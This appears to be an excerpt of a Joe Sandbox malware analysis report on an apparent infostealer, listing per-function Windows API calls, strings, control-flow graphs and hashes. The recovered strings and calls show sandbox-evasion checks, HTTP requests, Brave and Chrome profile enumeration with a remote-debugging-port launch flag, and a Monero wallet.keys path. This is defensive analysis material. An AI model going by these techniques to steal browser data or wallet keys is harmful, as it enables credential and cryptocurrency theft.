                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 1683118f020c96273bf37ff1cadb543a2d10d61a2bc969417ac6842bda66f8eb
                            • Instruction ID: 117b8abee397639572f9c24093a07b5e3deac5da346ca509f803e3bdf84511b3
                            • Opcode Fuzzy Hash: 1683118f020c96273bf37ff1cadb543a2d10d61a2bc969417ac6842bda66f8eb
                            • Instruction Fuzzy Hash: 9531F671E04248AFCB14FBE2EC66AFE7379AF59340F504919F21276193DF706A05CA62
                            Function 000D1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 d1220-d1247 call e8b40 GlobalMemoryStatusEx 1439 d1249-d1271 call edd30 * 2 1436->1439 1440 d1273-d127a 1436->1440 1442 d1281-d1285 1439->1442 1440->1442 1444 d129a-d129d 1442->1444 1445 d1287 1442->1445 1446 d1289-d1290 1445->1446 1447 d1292-d1294 ExitProcess 1445->1447 1446->1444 1446->1447
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                            • __aulldiv.LIBCMT ref: 000D1258
                            • __aulldiv.LIBCMT ref: 000D1266
                            • ExitProcess.KERNEL32 ref: 000D1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: d509d7a870e33d814d87f32a336afde36a1bc014510c3f1e1b440402a5349432
                            • Instruction ID: 27223e94396b0ac256b19da7e5a60b455b9bbe48fc541acad66d17cea7525e80
                            • Opcode Fuzzy Hash: d509d7a870e33d814d87f32a336afde36a1bc014510c3f1e1b440402a5349432
                            • Instruction Fuzzy Hash: 24011DB0D84308BEEF10DFE4CC4ABEEBBB8EB14705F20844AE604B62C1DB7555558B69
                            Function 000E6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 e6d93 1451 e6daa 1450->1451 1453 e6dac-e6dc2 call e6bc0 call e5d60 CloseHandle ExitProcess 1451->1453 1454 e6d5a-e6d77 call eade0 OpenEventA 1451->1454 1459 e6d79-e6d91 call eade0 CreateEventA 1454->1459 1460 e6d95-e6da4 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6D88
                            • CloseHandle.KERNEL32(00000000), ref: 000E6D99
                            • Sleep.KERNEL32(00001770), ref: 000E6DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6DBA
                            • ExitProcess.KERNEL32 ref: 000E6DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: e9cb8e4af8842b537f28aeef22c7758f11012fbb38b3926add357c219ce2c8ff
                            • Instruction ID: 5e8451886db475a4082f7935aca36ee57d0b16188fbd6b1307fbe34e13ddd72a
                            • Opcode Fuzzy Hash: e9cb8e4af8842b537f28aeef22c7758f11012fbb38b3926add357c219ce2c8ff
                            • Instruction Fuzzy Hash: DBF05E30F4C249EFEB61ABA2EC4ABFD73B8AF25781F504515B512B5192CBB16500CA51
                            Function 000D4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: f4b0d19623a89401b5ce577c880d850199d6e777dac26919dca5fd98de537994
                            • Instruction ID: 2a64f6df4cc458784af18841ba912b156740ee3413899cce383e9309e844761b
                            • Opcode Fuzzy Hash: f4b0d19623a89401b5ce577c880d850199d6e777dac26919dca5fd98de537994
                            • Instruction Fuzzy Hash: 16213EB1E00209ABDF14DFA5EC45ADE7B75FB45320F108625F925A7281EB706A05CF91
                            Function 000E5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D62D0: InternetOpenA.WININET(000F0DFF,00000001,00000000,00000000,00000000), ref: 000D6331
                              • Part of subcall function 000D62D0: StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6353
                              • Part of subcall function 000D62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6385
                              • Part of subcall function 000D62D0: HttpOpenRequestA.WININET(00000000,GET,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D63D5
                              • Part of subcall function 000D62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D640F
                              • Part of subcall function 000D62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D6421
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5478
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 8d3a912f70f7829246a00b00752d45f1f2a5b363d2f97bf7f6bf69a4ca957ff5
                            • Instruction ID: a6cd450e1607435a2613e68042a553436471052ac9b616d35c21a58d3fce7e2d
                            • Opcode Fuzzy Hash: 8d3a912f70f7829246a00b00752d45f1f2a5b363d2f97bf7f6bf69a4ca957ff5
                            • Instruction Fuzzy Hash: A7110330A00588AFDB14FFA5DDA2AED73399F55340F414568F91A6B593EF30BB04CA62
                            Function 000E7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7AA0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7AA7
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 000E7ABF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 227a161f292abc85c9bbea268eaa024e6edc2293d84d931b217bdaa6969fbad8
                            • Instruction ID: f75776be2366883c528354b4dbfb56672332616e64845bd0f05dc2260daa60bc
                            • Opcode Fuzzy Hash: 227a161f292abc85c9bbea268eaa024e6edc2293d84d931b217bdaa6969fbad8
                            • Instruction Fuzzy Hash: 4D0186B1A08249AFC714DF99DD85BAEBBBCF745711F10052AF615E2680D7745A0087A1
                            Function 000D1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                            • ExitProcess.KERNEL32 ref: 000D1143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 9cabec9acff04be218fedd099ba1f750a4f752a58319997465f7be475cb3bb02
                            • Instruction ID: cd26ce61207e038075bb5aeb7ce8e76812c369022653d1771a449f5eeb5b980a
                            • Opcode Fuzzy Hash: 9cabec9acff04be218fedd099ba1f750a4f752a58319997465f7be475cb3bb02
                            • Instruction Fuzzy Hash: B1E08670A49308FBE7116B909C0AB4C7A6C9B05B01F100045F708761D0CAB425404658
                            Function 000D10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000D10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000D10F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: c3859a738e9b3b2c39693f7dc7fde1e8c7980e1f6ee9f1a94bf6ea0a0a32640b
                            • Instruction ID: 89714324b3151be164ac564cc95f11c91d95af803cead7983df1201675baa197
                            • Opcode Fuzzy Hash: c3859a738e9b3b2c39693f7dc7fde1e8c7980e1f6ee9f1a94bf6ea0a0a32640b
                            • Instruction Fuzzy Hash: 58F082B1641318BBE714AAA4AC99FEEB7DCE706B05F304949F504E7290DA719E009BA4
                            Function 000D1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7AA0
                              • Part of subcall function 000E7A70: RtlAllocateHeap.NTDLL(00000000), ref: 000E7AA7
                              • Part of subcall function 000E7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 000E7ABF
                              • Part of subcall function 000E79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7A10
                              • Part of subcall function 000E79E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7A17
                              • Part of subcall function 000E79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E7A2F
                            • ExitProcess.KERNEL32 ref: 000D11C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: f229cf4787f24393015371b73479c224c1cf5d62daebe62e71504610a7ac395d
                            • Instruction ID: 68cd9f07b0ff010008bc98efb623935da7250f57b1d7f68ddd23ca7395eb6804
                            • Opcode Fuzzy Hash: f229cf4787f24393015371b73479c224c1cf5d62daebe62e71504610a7ac395d
                            • Instruction Fuzzy Hash: 22E012B5D483416BCA10B3B67C47B9B72CC5B5530AF040415F90CA2203EE25E8014275

                            Non-executed Functions

                            Function 000DBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,000F0B32,000F0B2F,00000000,?,?,?,000F1450,000F0B2E), ref: 000DBEC5
                            • StrCmpCA.SHLWAPI(?,000F1454), ref: 000DBF33
                            • StrCmpCA.SHLWAPI(?,000F1458), ref: 000DBF49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DC8A9
                            • FindClose.KERNEL32(000000FF), ref: 000DC8BB
                            Strings
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 000DC495
                            • Preferences, xrefs: 000DC104
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 000DC534
                            • \Brave\Preferences, xrefs: 000DC1C1
                            • Brave, xrefs: 000DC0E8
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 000DC3B2
                            • Google Chrome, xrefs: 000DC6F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-1869280968
